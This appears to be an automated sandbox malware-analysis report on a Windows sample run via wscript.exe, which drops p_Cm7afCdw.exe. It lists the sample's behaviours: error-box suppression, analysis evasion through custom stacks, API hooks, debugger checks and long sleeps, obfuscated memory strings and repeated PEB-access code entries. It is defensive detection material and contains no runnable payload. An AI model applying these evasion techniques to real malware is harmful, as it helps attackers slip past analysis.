                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C1A35F push cs; retf 6_2_02C1A367
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C1C6FC push 26B21532h; retf 6_2_02C1C701
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C22640 push ss; ret 6_2_02C22647
                Source: p_Cm7afCdw.exe.0.drStatic PE information: section name: .text entropy: 7.982947390430522
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory allocated: 4DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4BBA0 rdtsc 4_2_02C4BBA0
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 9760Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 3.2 %
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848Thread sleep count: 213 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848Thread sleep time: -426000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848Thread sleep count: 9760 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7848Thread sleep time: -19520000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C1CB30 FindFirstFileW,FindNextFileW,FindClose,6_2_02C1CB30
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000003.1421445735.000001E00361D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jtDaeooF+NFe@@k**q&&&6kZt))m1YEbb@@UEoWkHsCDYlFvXIoEyj**...ab))vmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15W...9e/@@8))2I9SySL
                Source: wscript.exe, 00000000.00000003.1469273605.000001E00365D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f/mGmjzVzUgZ**xoXVTFl3GLxe4xaNrHgFSWU**PPk+f5gq1Lzt8d
                Source: wscript.exe, 00000000.00000003.1452589014.000001E003689000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452620721.000001E003698000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1451780471.000001E003689000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1451524331.000001E003687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452852068.000001E00369F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::msLEKWOY755GSf**5FFy+fYCsvN66Dkvphqo6za/&&&/mGmjzVzUgZ**xoXVTFl3GLxe4xaNrHgFSWU**PPk+f5gq1Lzt8&&&4yIDAqGl77gSHxr7Y1qXjz9yxCItSzGqErk+5e
                Source: wscript.exe, 00000000.00000003.1468555940.000001E0038D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466828154.000001E00389E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1464839171.000001E00387B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466306313.000001E003896000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1467898012.000001E0038D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466633085.000001E00389B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466204499.000001E003895000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1467315143.000001E0038CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f/mGmjzVzUgZ**xoXVTFl3GLxe4xaNrHgFSWU**PPk+f5gq1Lzt8k=
                Source: wscript.exe, 00000000.00000003.1451497777.000001E000B5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RabTvmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15WjL**frN
                Source: wscript.exe, 00000000.00000003.1467315143.000001E0038CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6kZtTm1YEbbVUEoWkHsCDYlFvXIoEyj**BabTvmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15WB9e/V8T2I9SySLAW/m::8V5DaZPWnhclBFwhhV+rX9IySy8UcmwTe**::9ZPG3Kk6ogcp53r0C4Fb::BGHvxocsVzxUmM2
                Source: wscript.exe, 00000000.00000003.1465516449.000001E0036C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6kZtTm1YEbbVUEoWkHsCDYlFvXIoEyj**BabTvmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15WB9e/V8T2I9SySLAW/m::8V5DaZPWnhclBFwhhV+rX9IySy8UcmwTe**::9ZPG3Kk6ogcp53r0C4Fb::BGHvxocsVCylp
                Source: wscript.exe, 00000000.00000003.1428933062.000001E00363D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1429168269.000001E00363F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1428549520.000001E003637000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1430358240.000001E003656000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1431123126.000001E003664000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1430917407.000001E003661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fl3GLxe4xaNrHgFSWU**PPk+f5gq1Lzt8&&&4yIDAqGl77gSHxr7Y1qXjz9yxCItSzGqErk+5e...l::eOIvw1c~~/4mNaaXWamCt+tXXi7lbCII::eiXsprrSu3mtX00&&&PXgb
                Source: wscript.exe, 00000000.00000003.1438456518.000001E003835000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1443908307.000001E000B1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1443235257.000001E000B19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1434836882.000001E0037FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1438114650.000001E00380A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1434745216.000001E0037F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1431819136.000001E0037E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TFl3GLxe4xaNrHgFSWU**PPk+f5gq1Lzt8&&&4yIDAqGl77gSHxr7Y1qXjz9yxCItSzGqErk+5e...l::eOIvw1c~~/4mNaaXWamCt+tXXi7lbCII::eiXsprrSu3mtX00&&&PXgT9uxs5**mC1EG+::**6A1evEo+uyguE5H
                Source: wscript.exe, 00000000.00000003.1431947198.000001E00362A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UEoWkHsCDYlFvXIoEyj**...abTvmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15W...9e/
                Source: wscript.exe, 00000000.00000003.1433004637.000001E0036C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UEoWkHsCDYlFvXIoEyj**...abTvmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15W...9e/v
                Source: wscript.exe, 00000000.00000003.1428221981.000001E00372C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^vmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15W...9e/@@8
                Source: wscript.exe, 00000000.00000003.1423676417.000001E003738000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1424173491.000001E00373C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2r&&&iY8lwoE6a...215::tz::j...::msLEKWOY755GSf**5FFy+fYCsvN66Dkvphqo6za/&&&/mGmjz@@zUgZ**xoX@@))Fl3GLxe4xaNrHgFSWU**PPk+f5gq1Lzt8&&&4yID
                Source: wscript.exe, 00000000.00000003.1451300706.000001E000B2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RabTvmCi9I/E**kg**DH8ismWsSeio2Ko/**0UN15WY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4BBA0 rdtsc 4_2_02C4BBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417F53 LdrLoadDll,4_2_00417F53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A2C3 mov eax, dword ptr fs:[00000030h]4_2_02C2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A2C3 mov eax, dword ptr fs:[00000030h]4_2_02C2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A2C3 mov eax, dword ptr fs:[00000030h]4_2_02C2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A2C3 mov eax, dword ptr fs:[00000030h]4_2_02C2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A2C3 mov eax, dword ptr fs:[00000030h]4_2_02C2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B2C0 mov eax, dword ptr fs:[00000030h]4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C292C5 mov eax, dword ptr fs:[00000030h]4_2_02C292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C292C5 mov eax, dword ptr fs:[00000030h]4_2_02C292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B2D3 mov eax, dword ptr fs:[00000030h]4_2_02C1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B2D3 mov eax, dword ptr fs:[00000030h]4_2_02C1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B2D3 mov eax, dword ptr fs:[00000030h]4_2_02C1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4F2D0 mov eax, dword ptr fs:[00000030h]4_2_02C4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4F2D0 mov eax, dword ptr fs:[00000030h]4_2_02C4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD12ED mov eax, dword ptr fs:[00000030h]4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C302E1 mov eax, dword ptr fs:[00000030h]4_2_02C302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C302E1 mov eax, dword ptr fs:[00000030h]4_2_02C302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C302E1 mov eax, dword ptr fs:[00000030h]4_2_02C302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF52E2 mov eax, dword ptr fs:[00000030h]4_2_02CF52E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF2F8 mov eax, dword ptr fs:[00000030h]4_2_02CDF2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C192FF mov eax, dword ptr fs:[00000030h]4_2_02C192FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5E284 mov eax, dword ptr fs:[00000030h]4_2_02C5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5E284 mov eax, dword ptr fs:[00000030h]4_2_02C5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA0283 mov eax, dword ptr fs:[00000030h]4_2_02CA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA0283 mov eax, dword ptr fs:[00000030h]4_2_02CA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA0283 mov eax, dword ptr fs:[00000030h]4_2_02CA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5283 mov eax, dword ptr fs:[00000030h]4_2_02CF5283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5329E mov eax, dword ptr fs:[00000030h]4_2_02C5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5329E mov eax, dword ptr fs:[00000030h]4_2_02C5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C302A0 mov eax, dword ptr fs:[00000030h]4_2_02C302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C302A0 mov eax, dword ptr fs:[00000030h]4_2_02C302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C352A0 mov eax, dword ptr fs:[00000030h]4_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C352A0 mov eax, dword ptr fs:[00000030h]4_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C352A0 mov eax, dword ptr fs:[00000030h]4_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C352A0 mov eax, dword ptr fs:[00000030h]4_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE92A6 mov eax, dword ptr fs:[00000030h]4_2_02CE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE92A6 mov eax, dword ptr fs:[00000030h]4_2_02CE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE92A6 mov eax, dword ptr fs:[00000030h]4_2_02CE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE92A6 mov eax, dword ptr fs:[00000030h]4_2_02CE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB72A0 mov eax, dword ptr fs:[00000030h]4_2_02CB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB72A0 mov eax, dword ptr fs:[00000030h]4_2_02CB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov ecx, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CB62A0 mov eax, dword ptr fs:[00000030h]4_2_02CB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov eax, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov eax, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov ecx, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA92BC mov ecx, dword ptr fs:[00000030h]4_2_02CA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19240 mov eax, dword ptr fs:[00000030h]4_2_02C19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19240 mov eax, dword ptr fs:[00000030h]4_2_02C19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5724D mov eax, dword ptr fs:[00000030h]4_2_02C5724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A250 mov eax, dword ptr fs:[00000030h]4_2_02C1A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDB256 mov eax, dword ptr fs:[00000030h]4_2_02CDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDB256 mov eax, dword ptr fs:[00000030h]4_2_02CDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C26259 mov eax, dword ptr fs:[00000030h]4_2_02C26259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24260 mov eax, dword ptr fs:[00000030h]4_2_02C24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24260 mov eax, dword ptr fs:[00000030h]4_2_02C24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C24260 mov eax, dword ptr fs:[00000030h]4_2_02C24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CED26B mov eax, dword ptr fs:[00000030h]4_2_02CED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CED26B mov eax, dword ptr fs:[00000030h]4_2_02CED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1826B mov eax, dword ptr fs:[00000030h]4_2_02C1826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C49274 mov eax, dword ptr fs:[00000030h]4_2_02C49274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C61270 mov eax, dword ptr fs:[00000030h]4_2_02C61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C61270 mov eax, dword ptr fs:[00000030h]4_2_02C61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
